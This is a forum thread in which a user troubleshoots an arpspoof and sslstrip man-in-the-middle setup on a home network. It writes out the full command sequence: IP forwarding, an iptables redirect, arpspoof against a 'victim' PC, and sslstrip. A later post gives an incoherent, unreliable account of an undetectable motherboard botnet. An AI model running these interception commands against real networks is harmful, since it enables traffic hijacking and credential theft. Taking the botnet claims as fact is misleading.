Jump to content

arpspoof issue


Orange Chicken
 Share

Recommended Posts

Hello everyone. After many issues with ettercap I saw Darren's segment on sslstrip. I noticed he was using one of the Dsniff tools so I decided to give it a try. I run ubuntu 9.10 on my laptop and windows xp on my desktop. The steps I used were the same a Darren's in the show. My shell output for all of this is:

anon@ubuntu:~$ sudo su
[sudo] password for anon: 
root@ubuntu:/home/anon# sudo echo "1" > /proc/sys/net/ipv4/ip_forwardroot@ubuntu:/home/anon# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
root@ubuntu:/home/anon# arpspoof -i wlan0 -t 192.168.1.106 192.168.1.1
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a

192.168.1.106 is my xp box (victim) and 192.168.1.1 is of course the default gateway.

Then I cd to sslstrips folder "cd /home/anon/Downloads/sslstrip-0.7" and run it on port 8080 with "python sslstrip.py -l 8080"

So my issue is that when I try to surf the internet on the victim pc I get a Server not found page every time. Thanks for the help guys and gals.

P.S. I don't know if this makes a difference, but just for the heck of it the router is a linksys wrt54g. Thanks in advance

Link to comment
Share on other sites

I tried removing the quotes from echo "1" > /proc/sys/net/ipv4/ip_forward and I got the same result. I don't really know what I'm looking for when running wireshark, but to respond newbishly to your suggestion I'll tell you what i noticed. If I start a torrent on the target machine it is interrupted by arpspoof the same way that http traffic is halted, but in wireshark I can still see outgoing requests for webpages coming from the target machine. The reason I am using arpspoof is because I've had so many issues trying to use ettercap so that's out of the question at the moment. I'm anxiously awaiting a hak5 episode about ettercap to hopefully spur some good forum discussion about common issues with ettercap. Anyway, any other suggestions. Thanks for the ones so far.

Link to comment
Share on other sites

I tried removing the quotes from echo "1" > /proc/sys/net/ipv4/ip_forward and I got the same result. I don't really know what I'm looking for when running wireshark, but to respond newbishly to your suggestion I'll tell you what i noticed. If I start a torrent on the target machine it is interrupted by arpspoof the same way that http traffic is halted, but in wireshark I can still see outgoing requests for webpages coming from the target machine. The reason I am using arpspoof is because I've had so many issues trying to use ettercap so that's out of the question at the moment. I'm anxiously awaiting a hak5 episode about ettercap to hopefully spur some good forum discussion about common issues with ettercap. Anyway, any other suggestions. Thanks for the ones so far.

go to the ettercap site or RTFM!

ettercap is simple, best way is to capture and arp request packet with wireshark and edit it with hexedit and then make a script to send the packet every few seconds

dont be dependent on hak5 to solve all your issues and teach you everything

get out there and learn it yourself

Link to comment
Share on other sites

go to the ettercap site or RTFM!

ettercap is simple, best way is to capture and arp request packet with wireshark and edit it with hexedit and then make a script to send the packet every few seconds

dont be dependent on hak5 to solve all your issues and teach you everything

get out there and learn it yourself

Burning Aces, my post is not about ettercap and I have read the manual pages as well as many other sources on ettercap. I can use it but I receive errors no matter whether I compile it myself or what changes I make to etter.conf. I am a fan of hak5 and have been for some time, but that does not mean that I get all of my information here, I would simply like some active discussion about it. This, however, is not the thread in which I plan to discuss ettercap. I am interrested in solving this arpspoof issue. Thanks for your input, but my issue remains the same.

Link to comment
Share on other sites

Burning Aces, my post is not about ettercap and I have read the manual pages as well as many other sources on ettercap. I can use it but I receive errors no matter whether I compile it myself or what changes I make to etter.conf. I am a fan of hak5 and have been for some time, but that does not mean that I get all of my information here, I would simply like some active discussion about it. This, however, is not the thread in which I plan to discuss ettercap. I am interrested in solving this arpspoof issue. Thanks for your input, but my issue remains the same.

learn to make your own packets. as i said arp spoof is gay. if you wish ill show you how to craft your own packets

Link to comment
Share on other sites

Can you normally access the internet on your ubuntu box? It might be something as simple as not having the default gateway set on the linux machine. Open up a terminal and type in route. If it's not there - route add default gw 192.168.1.1 netmask 255.255.255.0. Assuming you're on that subnet.

Link to comment
Share on other sites

Can you normally access the internet on your ubuntu box? It might be something as simple as not having the default gateway set on the linux machine. Open up a terminal and type in route. If it's not there - route add default gw 192.168.1.1 netmask 255.255.255.0. Assuming you're on that subnet.

Yes, I can normally access the internet on my ubuntu box. My output for route is

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.1.0     *               255.255.255.0   U     2      0        0 wlan0
link-local      *               255.255.0.0     U     1000   0        0 wlan0
default         192.168.1.1     0.0.0.0         UG    0      0        0 wlan0

thanks

Link to comment
Share on other sites

  • 2 weeks later...

i can tell ya whats going on.

the highest priority of the hacker that created the botnet system since aug 2008 was to make it undetectable. the main botnet is actually a backdoor injected into your motherboard through a chip flaw. if you was to format and install a firewall, you can use sysinternal's process monitor and watch it use both sides of the connection to breakthrough. the hacker injects radio packets from a smartphone through a phone tower to send a request for info of your system. he then uses codes to talk back and forth using cookies and smtp. if you had best security, the hacker would create an incoming cookie that i always choose block/allow/view info. no matter what you choose, the worm intercepts the packets and recieves commands from your hacker buddy. the worm in return if need be, creates an smtp packet with codes in the subject using dollarsigns before and after a word. that is how they mainly talk. when you see ANON scripts or packets, that means that he hijacked your first master boot record. this is where the codes are that he injects into your browser to connect to other sites. when you see the ARP packets, it means that he has hijacked your drivers/firmware/kernel and set it up to run independant of your operating system. you may be pinging as much as 2 or 3 thousand ips per hour 24/7.

the only way to detect so far(besides your connection being so slow), is to put a router with a good log between your connection and computer . this will show incoming and outgoing. all that is required for this to run is to turn your machine on. and later on if you get these kernel lags, you prolly have another infected machine locally that is turned on. or it seems he may alter timers and threads.

when this first started and may be how you guys can help me figure out, you could not even low level format any hardrive if there was more than 1 active anywhere on the network. now i cant even low level format any drive. when i used dban, it repeativly mentioned DAV. and of course the access violation(cache(part of chip hack)) related. i went through my notes and noticed an old message i wrote down while monitoring the worm that said AXEL.DAV = data interface. i would like to know if anyone knows t hat that is or means.

thanks

Link to comment
Share on other sites

  • 1 month later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...